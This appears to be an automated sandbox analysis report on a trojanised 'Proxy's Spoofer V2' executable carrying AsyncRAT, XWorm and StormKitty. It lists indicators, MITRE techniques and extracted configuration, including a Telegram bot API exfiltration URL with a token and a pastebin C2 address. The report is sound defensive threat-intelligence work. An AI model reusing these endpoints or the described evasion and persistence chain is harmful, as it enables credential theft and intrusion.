asyncrat | c2cb46401abaa50730f59e048b6d826a5ae5e3d03caae622e4c4d080bdf51262

Analysis

max time kernel
59s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-11-2024 14:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

proxy's woofer/Proxy's Spoofer V2.exe
Size

6.0MB
MD5

710df7d1b2f1b2ee6753747d5c04b346
SHA1

294f0da01e406b2f58c132400385cb6f31d1c93e
SHA256

aa8b6bfba812dcd1a85296a313cf859837394b9f917313abba64fa7678a110ed
SHA512

b91a9e3cba368e6d3199f66817ab766e72ccc6556b8ee9abdaa50511e48fdb09ffa57b6548864f3e1b77fcdaeda7c30456aff90375fd3b3ee8267860f0fc2285
SSDEEP

98304:aEv4T1+hACMzMtXqIEO8ODEO4bTFF+LocldaK3//LMAEyHBso06:yTYbUVO8gWF+LDraK37MvJ6

Score

10^/10

asyncrat stormkitty xworm proxy defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware rat spyware stealer trojan

Malware Config

Extracted

Family

asyncrat

Version

Venom Pwn3rzs' Edtition v6.0.1

Botnet

Proxy

Mutex

0rU9DnsLkR

Attributes

delay
1
install
true
install_file
NetworkEX.exe
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/RgYXYwVV

aes.plain

Extracted

Family

xworm

Attributes

Install_directory
%AppData%
install_file
NetworkEXP.exe
pastebin_url
https://pastebin.com/raw/RgYXYwVV
telegram
https://api.telegram.org/bot6554307825:AAFiCM4YZlx7R1yb0K0d5pqenjePI2Nljfc/sendMessage?chat_id=6077384108

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Deletes NTFS Change Journal 2 TTPs 3 IoCs

The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

ransomware

Inhibit System Recovery

T1490

Data Destruction

T1485

pid	Process
5420	fsutil.exe
5436	fsutil.exe
2672	fsutil.exe

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral4/files/0x0007000000023c8a-55.dat	family_xworm
behavioral4/memory/3700-121-0x0000000000B70000-0x0000000000B8E000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral4/files/0x0007000000023c8b-71.dat	family_stormkitty
behavioral4/memory/2596-126-0x00000000007D0000-0x0000000000868000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral4/files/0x0007000000023c89-46.dat	family_asyncrat

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5212	powershell.exe
5944	powershell.exe
5884	powershell.exe
5720	powershell.exe
4884	powershell.exe
2752	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5568	netsh.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1744	attrib.exe
4720	attrib.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Proxy's Spoofer V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	NXT Cleaner.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	AccuracyFN Swoofer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Network Experience.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	NetworkEX.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	NEX.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Network.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	$77NetworkEX.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	NetworkEX.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetworkEXP.lnk	Network.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetworkEXP.lnk	Network.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	Cleaner.exe

Executes dropped EXE 14 IoCs

pid	Process
3616	NetworkEX.exe
3092	NXT Cleaner.exe
2636	nExOs.exe
1200	Koks_Cleaner.exe
2628	AccuracyFN Swoofer.exe
3416	Network Experience.exe
3700	Network.exe
2596	NetworkEX.exe
3048	NEX.exe
4480	NetworkEX.exe
3496	NetworkXE.exe
4884	Cleaner.exe
5596	$77NetworkEX.exe
3208	mac.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkXE = "\"C:\\Users\\Admin\\AppData\\Roaming\\NetworkXE.exe\""	NetworkEX.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkEXP = "C:\\Users\\Admin\\AppData\\Roaming\\NetworkEXP.exe"	Network.exe

Drops desktop.ini file(s) 52 IoCs

description	ioc	Process
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Public\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Cleaner.exe
File opened for modification	C:\$RECYCLE.BIN\S-1-5-21-4050598569-1597076380-177084960-1000\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Cleaner.exe

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	fsutil.exe
File opened (read-only)	\??\E:	fsutil.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
57	pastebin.com
9	pastebin.com
28	pastebin.com
43	pastebin.com
47	pastebin.com
53	pastebin.com
33	discord.com
37	pastebin.com
58	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\restore\MachineGuid.txt	Cleaner.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\RSATSE~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\netwns64.inf	cmd.exe
File opened for modification	C:\Windows\INF\mdmc26a.inf	cmd.exe
File opened for modification	C:\Windows\INF\netelx.inf	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LA86F6~1.MUM	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LA4094~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\iaLPSS2i_GPIO2_CNL.inf	cmd.exe
File opened for modification	C:\Windows\INF\wsearchidxpi\040C\idxcntrs.ini	cmd.exe
File opened for modification	C:\Windows\INF\netk57a.inf	cmd.exe
File opened for modification	C:\Windows\INF\rdpbus.inf	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LA8E27~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\SERVIC~3.0\0409\_ServiceModelServicePerfCounters_D.ini	cmd.exe
File opened for modification	C:\Windows\INF\acpidev.inf	cmd.exe
File opened for modification	C:\Windows\INF\mdmmct.inf	cmd.exe
File opened for modification	C:\Windows\INF\xusb22.inf	cmd.exe
File opened for modification	C:\Windows\INF\c_fsreplication.inf	cmd.exe
File opened for modification	C:\Windows\INF\netrtwlans.inf	cmd.exe
File opened for modification	C:\Windows\INF\SMSvcHost 4.0.0.0\0410\_SMSvcHostPerfCounters_d.ini	cmd.exe
File opened for modification	C:\Windows\INF\c_sslaccel.inf	cmd.exe
File opened for modification	C:\Windows\INF\mdmgl003.inf	cmd.exe
File opened for modification	C:\Windows\INF\nvraid.inf	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LAB6BD~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\avc.inf	cmd.exe
File opened for modification	C:\Windows\INF\mdmpin.inf	cmd.exe
File opened for modification	C:\Windows\INF\TermService\040C\tslabels.ini	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LA0CA3~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\SensorsHidClassDriver.inf	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\RSATRE~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\nete1g3e.inf	cmd.exe
File opened for modification	C:\Windows\INF\rdyboost\0410\ReadyBoostPerfCounters.ini	cmd.exe
File opened for modification	C:\Windows\INF\WINDOW~1.0\0411\PerfCounters_D.ini	cmd.exe
File opened for modification	C:\Windows\INF\mdmgl003.inf	cmd.exe
File opened for modification	C:\Windows\INF\iai2c.inf	cmd.exe
File opened for modification	C:\Windows\INF\mdmgl010.inf	cmd.exe
File opened for modification	C:\Windows\INF\modemcsa.inf	cmd.exe
File opened for modification	C:\Windows\INF\TermService\0C0A\tslabels.ini	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LAF97F~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\mdmvv.inf	cmd.exe
File opened for modification	C:\Windows\INF\wnetvsc.inf	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LAB725~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\wdma_usb.inf	cmd.exe
File created	C:\Windows\IME\Cleaner.exe	NXT Cleaner.exe
File opened for modification	C:\Windows\INF\rdyboost\0C0A\ReadyBoostPerfCounters.ini	cmd.exe
File opened for modification	C:\Windows\INF\c_fsphysicalquotamgmt.inf	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LADBD9~1.MUM	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LAF5D6~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\MSDTC Bridge 4.0.0.0\0411\_TransactionBridgePerfCounters_d.ini	cmd.exe
File opened for modification	C:\Windows\INF\oposdrv.inf	cmd.exe
File opened for modification	C:\Windows\INF\c_multiportserial.inf	cmd.exe
File opened for modification	C:\Windows\INF\LSM\0411\lagcounterdef.ini	cmd.exe
File opened for modification	C:\Windows\INF\whvcrash.inf	cmd.exe
File opened for modification	C:\Windows\INF\mdmnttp2.inf	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LAC052~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\avc.inf	cmd.exe
File opened for modification	C:\Windows\INF\hdaudss.inf	cmd.exe
File opened for modification	C:\Windows\INF\mdmcodex.inf	cmd.exe
File opened for modification	C:\Windows\INF\netg664.inf	cmd.exe
File opened for modification	C:\Windows\INF\c_fsinfrastructure.inf	cmd.exe
File opened for modification	C:\Windows\INF\idtsec.inf	cmd.exe
File opened for modification	C:\Windows\INF\npsvctrig.inf	cmd.exe
File opened for modification	C:\Windows\INF\vrd.inf	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LA633A~1.MUM	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\RSATIP~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\bthleenum.inf	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 21 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Proxy's Spoofer V2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetworkEX.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 9 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3704	cmd.exe
5424	cmd.exe
5296	cmd.exe
804	reg.exe
4860	cmd.exe
5684	reg.exe
2892	Process not Found
3136	Process not Found
5516	Process not Found

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
1364	timeout.exe
372	timeout.exe
5924	timeout.exe

Enumerates system info in registry 2 TTPs 32 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct = "Paste-242281858831503"	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct = "242281858831503"	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "7b279-f500-4a38a7f29"	Cleaner.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "24234-7317-169627407"	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	Cleaner.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "Paste-24228-18588-3150312048"	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	Cleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	Cleaner.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "Paste-24228-18588-3150312048"	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	Cleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	Cleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	Cleaner.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "d1b5f-a84f-a91f3123a"	Cleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "24234-7317-169627407"	reg.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
5728	ipconfig.exe
5284	ipconfig.exe
5852	ipconfig.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
5632	vssadmin.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
4420	taskkill.exe
1452	taskkill.exe
4864	taskkill.exe
4968	taskkill.exe
2756	taskkill.exe
3812	taskkill.exe
828	taskkill.exe
220	taskkill.exe
4648	taskkill.exe
1440	taskkill.exe
4648	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration	reg.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration\IE Installed Date = 2427027245159429959101028481853876221865	reg.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration\IE Installed Date = 749875f2717d6e4ec68584c37b642951a6ab39a9	Cleaner.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration	reg.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration\IE Installed Date = 2424128814465699971557531043660923394332	reg.exe

Modifies registry class 19 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-812970075899428864\shell\open\command	NXT Cleaner.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-812970075899428864\shell\open	NXT Cleaner.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\discord-812970075899428864\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NXT Cleaner.exe"	NXT Cleaner.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Installer	reg.exe
